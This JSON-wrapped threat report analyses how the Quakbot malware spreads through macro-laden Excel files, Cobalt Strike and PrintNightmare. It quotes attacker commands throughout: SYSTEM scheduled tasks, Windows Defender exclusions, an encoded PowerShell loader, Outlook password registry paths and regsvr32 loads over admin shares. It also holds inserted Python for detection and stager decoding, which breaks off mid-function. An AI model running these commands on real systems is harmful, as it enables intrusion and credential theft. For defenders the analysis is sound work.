{
	"id": "0c068708-543d-43ee-978e-100e0e534eeb",
	"created_at": "2026-04-06T00:09:43.338998Z",
	"updated_at": "2026-04-10T03:24:23.956906Z",
	"deleted_at": null,
	"sha1_hash": "c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe",
	"title": "Quakbot Strikes with QuakNightmare Exploitation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6878129,
	"plain_text": "Quakbot Strikes with QuakNightmare Exploitation\r\nArchived: 2026-04-05 21:25:10 UTC\r\nA Duck Nightmare\r\nQuakbot Strikes with QuakNightmare Exploitation\r\nBy: Max Malyutin – Orion Threat Research Team Leader\r\nThis is part of an extensive series of guides about Malware Protection\r\nPrologue\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 1 of 33\n\nAfter nearly two months of “summer vacation”, Quakbot is back with a new set of skills and tricks. We have\r\nhandled several incident response cases where Quakbot infected organizations through an email as the initial\r\naccess vector (malicious spam distribution campaigns) to deliver a weaponized Microsoft Office Excel document.\r\nWe found that Quakbot threat actors exploited the PrintNightmare vulnerability (CVE-2021-34527 – “Windows\r\nPrint Spooler Remote Code Execution”) in the later stages of the attack to perform privileged file operations and\r\ncode execution via the Windows Print Spooler service. Quakbot also used credential theft functionality to steal\r\nOutlook passwords intended for internal spear-phishing, luring users to interact with the malicious emails to infect\r\nadditional assets.\r\nThe threat actors also deployed Cobalt Strike beacons which allowed them to launch human-operated activities\r\nsuch as lateral movement, discovery, privilege escalation, etc.\r\nThese actions serve two main objectives – exfiltration of sensitive data and setting up the stage for ransomware\r\nexecution.\r\nQuakbot Overview\r\nQuakbot (also known as Qakbot or Qbot) is a modular Banking Trojan, active since the end of 2007. 
Quakbot\r\noriginally targeted the financial sector to steal credentials, financial information, and web browser data by using web\r\ninjection and browser hooking techniques that allowed it to “redirect” API calls to intercept financial data.\r\nIn the last two years, Quakbot’s targets expanded beyond the financial sector. We have observed victims from the\r\nIT services industry, telecommunications providers, manufacturing facilities and infrastructure companies.\r\nQuakbot threat actors upgraded the range of malicious capabilities and functionality to evade detection and spread\r\nvia different lateral movement techniques.\r\nIn this same period, we also detected Quakbot infections that include ransomware execution. During our threat\r\nintelligence activities and incident response cases we observed instances where Quakbot delivered REvil (a.k.a.\r\nSodinokibi) and Egregor ransomware.\r\nCase Overview\r\nIn this report, we will go through Quakbot’s execution tactics, techniques, and procedures (TTPs), and present\r\ndifferent behaviors, methods, tools, and strategies used by threat actors.\r\nDuring the Cynet Orion Research Team’s continuous campaign hunting cycle, we have observed an increase in\r\nmalicious email campaigns using Quakbot. Additionally, we have responded to incidents where companies asked\r\nfor Cynet 360 assistance with Quakbot infections.\r\nThe Quakbot infection has two initial execution paths. We gave them the following names:\r\n1. Datoploader\r\n2. 
Relativeloader\r\nAs with many infections across organizations today, threat actors obtained an initial foothold through malicious\r\nemail campaigns that lured users to interact with malicious links or attachments.\r\nIn both cases, a malicious link (leading to a ZIP file) or a direct attachment in the malicious email leads to the next\r\nstep of the infection – a weaponized Office document. The weaponized Office document contains macro code\r\n(Excel 4.0 XLM macros) that executes when the user clicks on “Enable Content”.\r\nThe macro execution leads to multi-stage malicious actions that include a command-and-control (C2) connection,\r\ndownload of malicious payloads, and execution of commands.\r\nQuakbot threat actors use several Defense Evasion (TA0005) techniques, such as process injection, masquerading,\r\nfileless execution, etc. to bypass security solutions such as anti-virus and EDR.\r\nThe malicious macro code executes the payload by abusing the legitimate Microsoft binary Regsvr32.exe. This type\r\nof procedure is also known as LOLBin (Living Off the Land Binaries) abuse, where threat actors use legitimate\r\nMicrosoft binaries instead of bringing their own malicious files. 
These LOLBins can be abused for proxy\r\nexecution of processes to bypass application whitelisting policies, credential dumping, discovery, and more.\r\nQuakbot Initial Access Execution Flow\r\nInitial Access (TA0001) Phishing (T1566) – distribution via malicious spam campaigns.\r\nExecution (TA0002) User Execution (T1204) – the victim interacts with the malicious link or attachment\r\n(weaponized Office document).\r\nThe victim interacts with the weaponized Office document and enables the macros.\r\nDefense Evasion (TA0005) Signed Binary Proxy Execution: Regsvr32 (T1218.010) – DLL payloads\r\ndownloaded from the C2 server and executed via regsvr32.\r\nThe Quakbot payload executes multiple actions including process hollowing injection, Outlook credential theft,\r\nCobalt Strike beacons, and fileless persistence via the registry.\r\nFor the first time, we have observed PrintNightmare exploitation in Quakbot infections.\r\nYou can find an analysis of PrintNightmare at the end of this report.\r\nMITRE Attack Tactics and Techniques Coverage\r\nTechnical Analysis: Initial Access and Execution\r\nUpdate by Kevin Beaumont – “Something is going on with Qakbot which alters detection/threat landscape in\r\npast week.”\r\nIt seems that threat actors abused enterprises and corporations that are using MS Exchange on-prem in order to\r\ndistribute malicious emails. This led us to suspect that the ProxyLogon and ProxyShell vulnerabilities are being\r\nexploited. 
These vulnerabilities allow Quakbot threat actors to bypass email security policies (mail sent from a victim’s own Exchange server passes as legitimate internal mail) and propagate\r\nQuakbot infections.\r\nProxyLogon – CVE-2021-26855, CVE-2021-27065\r\nProxyShell – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207\r\n“TR” is the name researchers gave to the Quakbot distribution infrastructure and to the actor that runs these malicious spam campaigns;\r\nthe same researchers also refer to the actor as “ChaserLdr.”\r\nMalicious emails are sent as part of phishing campaigns and contain a link to a compromised URL which leads to\r\nthe ZIP file. The threat actors’ motivation is to lure the victim to interact with the phishing email and download the\r\nZIP file.\r\nHere is a URL search on TR campaign URLs that distribute the Quakbot ZIP file:\r\nhttps://urlhaus.abuse.ch/browse/tag/TR/\r\nThe ZIP file contains the weaponized Excel document. We have identified several unique patterns of the\r\nweaponized Excel document names, including:\r\nmiss-[0-9]{9}.xls\r\ntrend-[0-9]{7}.x1s\r\ncharts-[0-9]{10}.xls\r\nClaim-Copy-[0-9]{10}.xls\r\nService-Interrupt-[0-9]{10}.xls\r\nThe weaponized Excel document (Datoploader maldoc) contains a fake Microsoft Office template message which\r\nlures the user to click on two messages:\r\n1. Select “Enable Editing” – Protected View message\r\n2. Select “Enable Content” – Security Warning message\r\nThe weaponized Excel document (Relativeloader maldoc) contains a fake DocuSign template message which\r\nlures the user to click on two messages:\r\n1. 
Select “Enable Editing” – Protected View message\r\n2. Select “Enable Content” – Security Warning message\r\nBoth weaponized Excel documents – Datoploader and Relativeloader – contain malicious macro code. Threat\r\nactors crafted these weaponized Excel documents with several tricks to bypass security detections and to complicate\r\nanalysis by security researchers.\r\nDatoploader contains Excel 4.0 (XLM) macros. The macros are spread across several sheets and written in a\r\nwhite font, with highly obfuscated code. Evasion techniques include:\r\nHiding sheets in the document\r\nHiding Excel 4.0 macros in different sheets\r\nAuto_Open function – run a macro when Excel opens the workbook\r\nHiding the macro formula by applying a white font color\r\nObfuscation and scrambling of the macros across different sheets\r\nRelativeloader also contains Excel 4.0 macro code together with a password-protected VBA project. Evasion\r\ntechniques include:\r\nHiding a sheet in the document\r\nHiding Excel 4.0 macros in the sheet\r\nPassword-protected VBA project\r\nAuto_Open function – run a macro when Excel opens the workbook\r\nHiding the macro formula by applying a black font color\r\nObfuscation and scrambling of the macro\r\nUpdate (04/11/2021): We observed a new payload name. 
Threat actors now name the payload:\r\ngood.good\r\ngood1.good\r\ngood2.good\r\nFor the new payload named good.good, here is the macro code with the new format:\r\nRelativeloader and Datoploader highlight keys in the macro code:\r\nArtifact – Description\r\nKernel32 CreateDirectoryA, Urlmon URLDownloadToFileA, Shell32 ShellExecuteA – WinAPI functions used to download the file, create a new\r\ndirectory, and execute the process\r\nC:\\Datop\\test.test, C:\\Datop\\test1.test, C:\\Datop\\test2.test, C:\\Datop\\good.good, C:\\Datop\\good1.good, C:\\Datop\\good2.good – New directory where the payload is dropped;\r\ngood.good is the new version’s payload name\r\nregsvr32 -silent ..\\[RandomFileName].[RandomFileName] and regsvr32.exe C:\\Datop\\test.test – Regsvr32 execution commands\r\nhttp://[IP]/[0-9]{5}.[0-9]{10}.dat – C2 server pattern for the Relativeloader maldoc\r\nThreat actors abuse Regsvr32.exe (MITRE T1218.010) to proxy execute the malicious payload dropped by the\r\nmacro execution.\r\nTechnical Analysis: Persistence and Defense Evasion\r\nRegsvr32.exe is a legitimate Microsoft binary responsible for registering DLL files as COM components in the\r\nregistry. 
This file is also classified as a LOLBin with application whitelisting (AWL) bypass and execute\r\ncapabilities.\r\nQuakbot execution flow – Relativeloader:\r\nThe malicious Excel macro creates a process (=EXEC) in order to execute the regsvr32 command:\r\nThe regsvr32 command executes the payload with the -silent parameter:\r\nQuakbot execution flow – Datoploader:\r\nThe malicious Excel macro creates a process (ShellExecuteA) in order to execute the regsvr32 command:\r\nIn both cases, the Quakbot execution flow executes the regsvr32 process three times in order to load masqueraded\r\nDLL payloads (test, good, random).\r\nAt this step, the machine is fully compromised and infected and Quakbot is ready to strike with the next attack\r\ntechniques. We discovered that the next step is process injection.\r\nQuakbot uses CreateProcessW to create a new process. By default, Quakbot creates an Explorer.exe process. There\r\nare two other processes which could be injected during the infection:\r\nmsra.exe\r\nOneDriveSetup.exe\r\nThe Regsvr32 (initial Quakbot loader) process opens a handle (0x1FFFFF, PROCESS_ALL_ACCESS) to the created Explorer\r\nprocess in order to allocate memory for the malicious code.\r\nWriteProcessMemory function – Writes data to an area of memory in a specified process. The first parameter is\r\nhProcess (a handle to the target process) and the third parameter is lpBuffer (the buffer that contains the data to be\r\nwritten in the address space of the specified process). 
After the WriteProcessMemory WinAPI call, the\r\nQuakbot malicious function executes and injects PE code inside the RWX page of the targeted Explorer process.\r\nNote: the legitimate Explorer process executes most of the time from the C:\\Windows directory and not from\r\nC:\\Windows\\SysWOW64\\. Additionally, as the SANS DFIR “Find Evil – Know Normal” poster confirms, the\r\nlegitimate parent process of Explorer.exe is userinit.exe. In a Quakbot infection, the parent\r\nprocess of the injected Explorer process is Regsvr32.\r\nAfter examining the injected explorer process, we found the C2 configuration in clear text in\r\nmemory:\r\nWe have spotted that the Quakbot C2 servers’ URL pattern is https://[IP]/t4\r\nThe injected explorer process creates a Scheduled Task (Scheduled Task/Job: Scheduled Task – T1053.005) with a\r\nrandom name to perform privilege escalation and persistence on the infected machine (the task runs the payload as SYSTEM; creating it requires administrative rights on the host).\r\nScheduled Task creation command:\r\nschtasks.exe /Create /RU \"NT AUTHORITY\\SYSTEM\" /tn [TaskName] /tr \"regsvr32.exe -s \\\"C:\\Users\\*\\AppData\\Local\\Temp\\[payload].dll\\\"\" /SC ONCE /Z /ST [Time] /ET [Time]\r\nThe malicious Scheduled Task is configured to execute whether or not the user is logged on:\r\nIn addition, we saw another form of task creation where the malicious task executes a PowerShell command\r\nwhich launches fileless execution from this registry value:\r\nThe Regsvr32 process launched by the malicious Scheduled Task as SYSTEM performed a\r\nprocess injection into Explorer.exe (once more). 
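The loader and persistence chain above (regsvr32 loading test.test or good.good from C:\\Datop with Excel as its parent, explorer.exe spawned by regsvr32, and a SYSTEM scheduled task whose action is regsvr32 -s) is straightforward to express as event-based detection logic. The following is an added example, not code from the Cynet report: Python that scores constructed process-creation events against those patterns, and also covers the reg.exe Defender-exclusion writes and the regsvr32 loads from \\\\[IP]\\C$ admin shares that the report describes in later sections. The event field names (image, parent, cmdline) are an assumed simplification of Sysmon Event ID 1 fields, and every event below is constructed.

```python
# Added example, not from the Cynet report: flags the loader and persistence
# command lines described above in a stream of process-creation events.
# The event schema (image, parent, cmdline) is an assumed simplification of
# what Sysmon Event ID 1 or an EDR provides, and all events are constructed.
BS = chr(92)  # backslash, kept out of the source so the samples build cleanly
DQ = chr(34)  # double quote


def win(*parts):
    # Join path components with backslashes, e.g. win('C:', 'Datop').
    return BS.join(parts)


def last_arg(cmdline):
    '''Return the final argument, honouring a trailing double-quoted token.'''
    cmdline = cmdline.rstrip()
    if cmdline.endswith(DQ):
        start = cmdline.rfind(DQ, 0, len(cmdline) - 1)
        return cmdline[start + 1:-1]
    return cmdline.split()[-1]


def flag_event(ev):
    '''Return the reasons an event matches the Quakbot TTPs, empty if none.'''
    image = ev.get('image', '').lower()
    parent = ev.get('parent', '').lower()
    cmd = ev.get('cmdline', '').lower()
    reasons = []
    if image.endswith('regsvr32.exe'):
        target = last_arg(cmd)
        # T1218.010: payload loaded from the drop directory, a user-writable
        # profile path, or an admin share (the lateral-movement form).
        drop_paths = (win('c:', 'datop'), win('appdata', 'roaming'),
                      win('appdata', 'local'), 'programdata')
        if any(p in target for p in drop_paths) or target.startswith(BS + BS):
            reasons.append('regsvr32 loading payload from drop/share path: ' + target)
        # Masquerading: test.test / good.good are DLLs without a DLL extension.
        if not target.endswith(('.dll', '.ocx')):
            reasons.append('regsvr32 target lacks a DLL extension: ' + target)
        if parent.endswith('excel.exe'):
            reasons.append('regsvr32 spawned by Excel (macro execution)')
        if parent.endswith('services.exe'):
            reasons.append('regsvr32 started as a service (remote service execution)')
    if image.endswith('schtasks.exe') and '/create' in cmd:
        # T1053.005: a SYSTEM task whose action is regsvr32 loading a payload.
        if 'nt authority' + BS + 'system' in cmd and 'regsvr32' in cmd:
            reasons.append('SYSTEM scheduled task running regsvr32')
    if image.endswith('reg.exe') and win('windows defender', 'exclusions') in cmd:
        # T1562.001: Defender path exclusion added with reg.exe.
        reasons.append('Windows Defender exclusion added via reg.exe')
    if image.endswith('explorer.exe') and parent.endswith('regsvr32.exe'):
        # Explorer is normally started by userinit.exe; regsvr32 as its parent
        # is the injection chain described in the report.
        reasons.append('explorer.exe spawned by regsvr32 (injection target)')
    return reasons


def scan(events):
    '''Return [(index, reasons)] for every flagged event, in order.'''
    hits = []
    for i, ev in enumerate(events):
        reasons = flag_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed events mirroring the report's process trees; the last is benign.
SYSWOW = win('C:', 'Windows', 'SysWOW64')
SYS32 = win('C:', 'Windows', 'System32')
SAMPLE_EVENTS = [
    {'image': win(SYSWOW, 'regsvr32.exe'),
     'parent': win('C:', 'Program Files (x86)', 'Microsoft Office', 'Office16', 'EXCEL.EXE'),
     'cmdline': 'regsvr32.exe ' + win('C:', 'Datop', 'test.test')},
    {'image': win(SYSWOW, 'explorer.exe'), 'parent': win(SYSWOW, 'regsvr32.exe'),
     'cmdline': win(SYSWOW, 'explorer.exe')},
    {'image': win(SYS32, 'schtasks.exe'), 'parent': win(SYSWOW, 'explorer.exe'),
     'cmdline': 'schtasks.exe /Create /RU ' + DQ + win('NT AUTHORITY', 'SYSTEM') + DQ
                + ' /tn hqzkd /tr ' + DQ + 'regsvr32.exe -s '
                + win('C:', 'Users', 'bob', 'AppData', 'Local', 'Temp', 'upd.dll') + DQ
                + ' /SC ONCE /Z /ST 13:05 /ET 13:17'},
    {'image': win(SYS32, 'reg.exe'), 'parent': win(SYSWOW, 'explorer.exe'),
     'cmdline': 'reg.exe ADD ' + DQ
                + win('HKLM', 'SOFTWARE', 'Microsoft', 'Windows Defender', 'Exclusions', 'Paths')
                + DQ + ' /f /t REG_DWORD /v ' + DQ + win('C:', 'ProgramData', 'Microsoft', 'Qwerty')
                + DQ + ' /d ' + DQ + '0' + DQ},
    {'image': win(SYS32, 'regsvr32.exe'), 'parent': win(SYS32, 'services.exe'),
     'cmdline': 'regsvr32.exe -s ' + BS + win('', '10.1.2.3', 'C$', 'kjhg.dll')},
    {'image': win(SYS32, 'regsvr32.exe'), 'parent': win('C:', 'Windows', 'explorer.exe'),
     'cmdline': 'regsvr32.exe /s ' + DQ + win('C:', 'Program Files', 'Vendor', 'vendorctl.dll') + DQ},
]

if __name__ == '__main__':
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]['cmdline'])
        for r in reasons:
            print('   ', r)
```

Run it as a script to print the hits. The drop-path list needs tuning per environment, because a legitimate installer can also call regsvr32 /s from a user profile; that is why the script reports reasons rather than a verdict, and why the benign last event (a signed vendor DLL under Program Files, started by the real explorer.exe) produces none.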
Additionally, the injected explorer process spawned two new\r\nreg.exe processes.\r\nC:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule (the Task Scheduler service host) is responsible for the execution below:\r\nThe first Reg.exe command executed via the injected explorer process:\r\nC:\\Windows\\system32\\reg.exe ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\" /f /t REG_DWORD /v \"C:\\ProgramData\\Microsoft\\[RandomPath]\" /d \"0\"\r\nThe second Reg.exe command executed via the injected explorer process:\r\nC:\\Windows\\system32\\reg.exe ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\" /f /t REG_DWORD /v \"C:\\Users\\*\\AppData\\Roaming\\Microsoft\\[RandomPath]\" /d \"0\"\r\nFurthermore, concerning persistence, we have observed Run key persistence (Boot or Logon Autostart\r\nExecution: Registry Run Keys / Startup Folder – T1547.001):\r\nRegistry Key: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue: random name, for example gbqmhjwbdat, Nnrolhjksp, iwiqxgkbe\r\nData: regsvr32.exe -s \"C:\\Users\\*\\AppData\\Roaming\\Microsoft\\[Random]\\[Random].dll\"\r\nThe excluded paths are the same paths referenced in the data of the Run key value, which means that the Run key\r\nexecution avoids Windows Defender detection: Windows Defender does not scan these paths and allows the\r\npayloads to run.\r\nThis action allows threat actors to run the dropped Quakbot payloads from the paths added to the Defender\r\nexclusions:\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\[RandomPath]\r\nC:\\ProgramData\\Microsoft\\[RandomPath]\r\nMoreover, the initial payloads (test.test or good.good) are overwritten in order to corrupt the artifact:\r\nThe next stage of the attack is related to 
Outlook password theft. Quakbot performs this action via its credential theft\r\nfunctionality. We have observed an attempt to query and enumerate registry keys and values which are related to\r\nOutlook passwords (Credentials from Password Stores – T1555).\r\nProcess execution flow:\r\nGrandparent Process:\r\nc:\\windows\\syswow64\\regsvr32.exe C:\\Datop\\(test.test or good.good)\r\nParent Process:\r\nc:\\windows\\syswow64\\explorer.exe\r\nProcess:\r\nc:\\windows\\syswow64\\explorer.exe\r\nQuakbot queries registry values (observed via the RegNtPreQueryValueKey callback) in order to collect data from:\r\nRegistry keys:\r\nHKCU:\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\*\r\nHKCU:\\SOFTWARE\\Microsoft\\Office\\*\\Outlook\\Profiles\\ \\OUTLOOK\\*\r\nHKCU:\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\*\r\nRegistry values: IMAP Password, POP3 Password, SMTP Password\r\nTechnical Analysis: Discovery\r\nThe injected process also performed basic discovery commands. We have observed the following legitimate\r\nMicrosoft binaries used for the discovery execution:\r\nsysteminfo.exe\r\narp.exe\r\nnet.exe\r\nipconfig.exe\r\nnetstat.exe\r\nnltest.exe\r\nschtasks.exe\r\nqwinsta.exe\r\nnslookup.exe\r\nroute.exe\r\nObserved command lines:\r\nwhoami /all\r\narp -a\r\nschtasks.exe /Query /V /FO LIST /TN {*}\r\nnltest /domain_trusts /all_trusts\r\nqwinsta\r\nnslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.IPER\r\nroute print\r\nnet accounts /domain\r\nThe systeminfo, arp, netstat and ipconfig commands were used to gather information on the infected machine. The net and\r\nnltest commands were used to collect information on the domain network. 
This information allows the threat\r\nactors to plan the next steps to execute lateral movement and privilege escalation. The main goal at this point is to\r\npivot to the Domain Controller server and access a Domain Admin user.\r\nAdditionally, we have observed a new Discovery execution flow via an encoded PowerShell command:\r\nThe decoded malicious command:\r\nAdfind.exe commands executed as part of the Discovery action:\r\nadfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName\r\nadfind.exe -b dc=*,dc=* -f objectcategory=computer -csv name cn OperatingSystem dNSHostName\r\nTechnical Analysis: Lateral Movement\r\nQuakbot used lateral movement techniques by abusing services (Remote Services T1021) in order to spread\r\nQuakbot DLLs via network shared folders (a regsvr32 process started by the Service Control Manager, i.e. with services.exe as its parent, loads the DLL from a UNC share path):\r\nParent Process:\r\nc:\\windows\\system32\\services.exe\r\nProcess:\r\nregsvr32.exe -s \\\\[IP]\\C$\\[RandomName].dll\r\nregsvr32.exe -s \\\\[IP]\\ADMIN$\\[RandomName].dll\r\nregsvr32.exe -s \\\\[IP]\\print$\\[RandomName].dll\r\nTechnical Analysis: Cobalt Strike Activity\r\nWe have observed Cobalt Strike execution in a few forms: via a fileless PowerShell script, process injection, and DLL\r\nbeacons. 
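The fileless PowerShell form mentioned above is layered: the -encodedcommand argument is base64 of UTF-16LE text, the decoded script base64-decodes and gunzips a second script, and that script holds the beacon shellcode as a base64 blob XORed with 35 before injecting it. The following added example (not code from the Cynet report, and not Cobalt Strike’s own code) builds such a stager around constructed fake shellcode and then unpacks it layer by layer, recovering the XOR key from the script text and extracting the named-pipe string that identifies the beacon. Only the pipe name is taken from the report; the shellcode bytes and the script text are assumptions modelled on the stager format.

```python
# Added example, not from the Cynet report: unpacks a layered Cobalt Strike
# PowerShell stager of the kind described in this section, entirely offline.
# Layers, outermost first: the -encodedcommand value (base64 of UTF-16LE
# text), a gzip+base64 script that IEXes its contents, and an inner script
# holding the beacon shellcode as a base64 blob XORed with 35 (0x23).
# The sample stager is built here around fake shellcode; only the named-pipe
# string inside it is realistic.
import base64
import gzip

BS = chr(92)   # backslash
DQ = chr(34)   # double quote
SQ = chr(39)   # single quote
NL = chr(10)
PIPE_PREFIX = BS + BS + '.' + BS + 'pipe' + BS   # local named-pipe prefix
DEFAULT_KEY = 35


def build_sample_stager(shellcode, key=DEFAULT_KEY):
    '''Wrap shellcode the way the observed stager does (test-data generator).'''
    xored = bytes(b ^ key for b in shellcode)
    inner = ('[Byte[]]$var_code = [System.Convert]::FromBase64String(' + SQ
             + base64.b64encode(xored).decode() + SQ + ')' + NL
             + 'for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor '
             + str(key) + ' }' + NL)
    packed = base64.b64encode(gzip.compress(inner.encode())).decode()
    outer = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(' + DQ + packed + DQ
             + '));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
             + '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();')
    return base64.b64encode(outer.encode('utf-16-le')).decode()


def b64_argument(script, marker='FromBase64String('):
    '''Return the (quoted or bare) base64 argument that follows marker.'''
    start = script.index(marker) + len(marker)
    end = script.index(')', start)
    return script[start:end].strip(DQ + SQ + ' ')


def xor_key_from(script):
    '''Recover the key from the -bxor expression instead of assuming 35.'''
    after = script.split('-bxor', 1)[1].split()
    return int(after[0].rstrip('}'))


def decode_stager(encoded_command):
    '''Return (outer_script, inner_script, shellcode) for an -encodedcommand value.'''
    outer = base64.b64decode(encoded_command).decode('utf-16-le')
    inner = gzip.decompress(base64.b64decode(b64_argument(outer))).decode()
    blob = base64.b64decode(b64_argument(inner))
    key = xor_key_from(inner)
    return outer, inner, bytes(b ^ key for b in blob)


def find_pipe_names(shellcode):
    '''List printable named-pipe strings, the beacon IPC indicator.'''
    text = shellcode.decode('latin-1')
    names = []
    pos = text.find(PIPE_PREFIX)
    while pos != -1:
        end = pos
        while end < len(text) and 32 < ord(text[end]) < 127:
            end += 1
        names.append(text[pos:end])
        pos = text.find(PIPE_PREFIX, end)
    return names


# Constructed: a few opcode-like bytes around the pipe name seen in the report.
SAMPLE_SHELLCODE = (bytes([0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8])
                    + (PIPE_PREFIX + 'mojo.5688.805').encode()
                    + bytes([0, 0x90, 0x90, 0xc3]))
SAMPLE_ENCODED = build_sample_stager(SAMPLE_SHELLCODE)

if __name__ == '__main__':
    outer, inner, code = decode_stager(SAMPLE_ENCODED)
    print('encodedcommand starts with:', SAMPLE_ENCODED[:12])
    print('outer script starts with:', outer[:40])
    print('xor key:', xor_key_from(inner), 'shellcode bytes:', len(code))
    print('pipes:', find_pipe_names(code))
```

Two checks worth keeping in mind when decoding by hand: a gzip stream base64-encodes to a string that begins with H4sI (the magic bytes 1f 8b 08), and an -encodedcommand value that begins with JABzAD0A decodes to $s= in UTF-16LE; both match the command lines quoted on this page.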
Cobalt Strike process injection: the explorer process injected by Quakbot pivots to another process and injects\r\nthe Cobalt Strike shellcode into it. For example, we have detected an injection into dllhost.exe by creating\r\na remote thread in the newly injected process.\r\nc:\\windows\\syswow64\\explorer.exe \u003e c:\\windows\\syswow64\\dllhost.exe\r\nInjected dllhost page metadata:\r\nState=4096 (MEM_COMMIT 0x00001000), Type=131072 (MEM_PRIVATE 0x00020000),\r\nAllocationProtect=64 (PAGE_EXECUTE_READWRITE 0x40)\r\nOther processes we have observed Cobalt Strike injecting into during incident response cases:\r\n\\sysnative\\werfault.exe\r\n\\sysnative\\regsvr32.exe\r\n\\sysnative\\userinit.exe\r\n\\sysnative\\mstsc.exe\r\n\\sysnative\\net.exe\r\n\\sysnative\\svchost.exe\r\n\\sysnative\\gpupdate.exe\r\n\\sysnative\\lsass.exe\r\n\\sysnative\\searchindexer.exe\r\nCobalt Strike beacons – As we mentioned, the threat actors excluded two paths. 
One of these paths is\r\nC:\\ProgramData\\Microsoft\\:\r\nC:\\Windows\\system32\\reg.exe ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\" /f /t REG_DWORD /v \"C:\\ProgramData\\Microsoft\\[RandomPath]\" /d \"0\"\r\nWe observed that the Cobalt Strike beacons were dropped to this directory:\r\nCS beacon location:\r\nc:\\programdata\\microsoft\\[Random]\\[Random].dll\r\nExecution command-line:\r\nregsvr32.exe -s \"c:\\programdata\\microsoft\\[Random]\\[Random].dll\"\r\nIn addition, we detected an attempt to launch Cobalt Strike fileless execution via a malicious PowerShell\r\ncommand.\r\nParent Process:\r\nc:\\windows\\system32\\services.exe\r\nProcess:\r\nC:\\windows\\system32\\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand\r\nJABzAD0ATgBlA…=\r\nDecoded base64 command (the -encodedcommand value is base64 of UTF-16LE text, which is why it begins with JABzAD0A, the encoding of “$s=”):\r\n$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAAAK1WbXPaOBD…\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,\r\n[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\nAfter FromBase64String and GzipStream decompression (H4sI is the base64 form of the gzip magic bytes 1f 8b 08), the next-stage script is:\r\nIn order to decode the Cobalt Strike shellcode, we have used this section:\r\nVia a CyberChef “bake” we get the clear text shellcode: From Base64 of $var_code, then XOR with the key taken from the script (-bxor 35, i.e. 0x23):\r\nThe shellcode contains the string “\\\\.\\pipe\\mojo.5688.805…”, which represents the Cobalt Strike beacon’s named-pipe inter-process communication (IPC) mechanism, using CreateNamedPipe and ConnectNamedPipe.\r\nCobalt Strike beacon common pipe pattern:\r\n\\\\.\\pipe\\mojo.5688.805\r\nThe self-injected PowerShell process used the Cobalt Strike PsExec module in order to drop additional Cobalt\r\nStrike beacons on other machines in the domain through share 
folders.\r\n\\\\[Host.Domain]\\admin$\\[0-9]{7}.exe == C:\\Windows\\[0-9]{7}.exe\r\nTechnical Analysis: PrintNightmare\r\nPrintNightmare is a Windows Print Spooler Remote Code Execution (RCE) vulnerability (CVE-2021-34527) that\r\nallows an authenticated user to perform privileged file operations via the Windows Print Spooler service by installing a printer driver whose files the attacker controls. Quakbot threat actors\r\nsuccessfully exploited this vulnerability and obtained SYSTEM-level execution for their malicious code. Through the\r\nexploited Print Spooler service (spoolsv.exe), the threat actors created a DLL payload named spider.dll in\r\nthe C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ path.\r\nThe spoolsv.exe process registered the DLL payload by abusing the printer driver registry key and created a new key named\r\n“123456”.\r\nRegistry key:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\123456\r\nDLL payload path:\r\nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\spider.dll\r\nThe print driver key contains the values “Configuration File” and “Data File” with the payload DLL name (spider.dll).\r\nAfter the exploitation, the QuakNightmare process (spoolsv.exe) executed the CMD command:\r\nC:\\WINDOWS\\system32\\cmd.exe /c cmd.exe /c C:\\Users\\Public\\25443.exe\r\nFinal Thoughts\r\nOur investigation is still active as we have collected more information and logs from several IR cases of Quakbot\r\ninfections. We believe that the main goals of the threat actors are to exfiltrate sensitive data and information, and\r\nto execute a ransomware attack as we have seen in the past. 
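The registry and file artifacts in the PrintNightmare section above suggest a simple triage of the Version-3 print driver keys on any host in scope. The following added example (not code from the Cynet report) flags driver subkeys with a numeric name, a Data File that is a DLL, a Configuration File identical to the Data File, or a full path where a bare file name is expected. These heuristics are this example’s assumptions rather than documented Microsoft rules, and the sample driver table is constructed; on a Windows host the script reads the live keys with winreg, elsewhere it falls back to the sample.

```python
# Added example, not from the Cynet report: triages the Version-3 print driver
# keys for the artifacts described above. The sample driver table is
# constructed; load_from_registry() reads the live keys on a Windows host.
# Heuristic assumptions: a legitimate driver key stores bare file names, its
# Data File is a GPD/PPD/XML description rather than a DLL, and its
# Configuration File differs from its Data File.
BS = chr(92)
DRIVERS_SUBKEY = BS.join(['SYSTEM', 'CurrentControlSet', 'Control', 'Print',
                          'Environments', 'Windows x64', 'Drivers', 'Version-3'])
FIELDS = ('Configuration File', 'Data File', 'Driver')


def triage_driver(name, values):
    '''Return the reasons a driver subkey looks like a PrintNightmare artifact.'''
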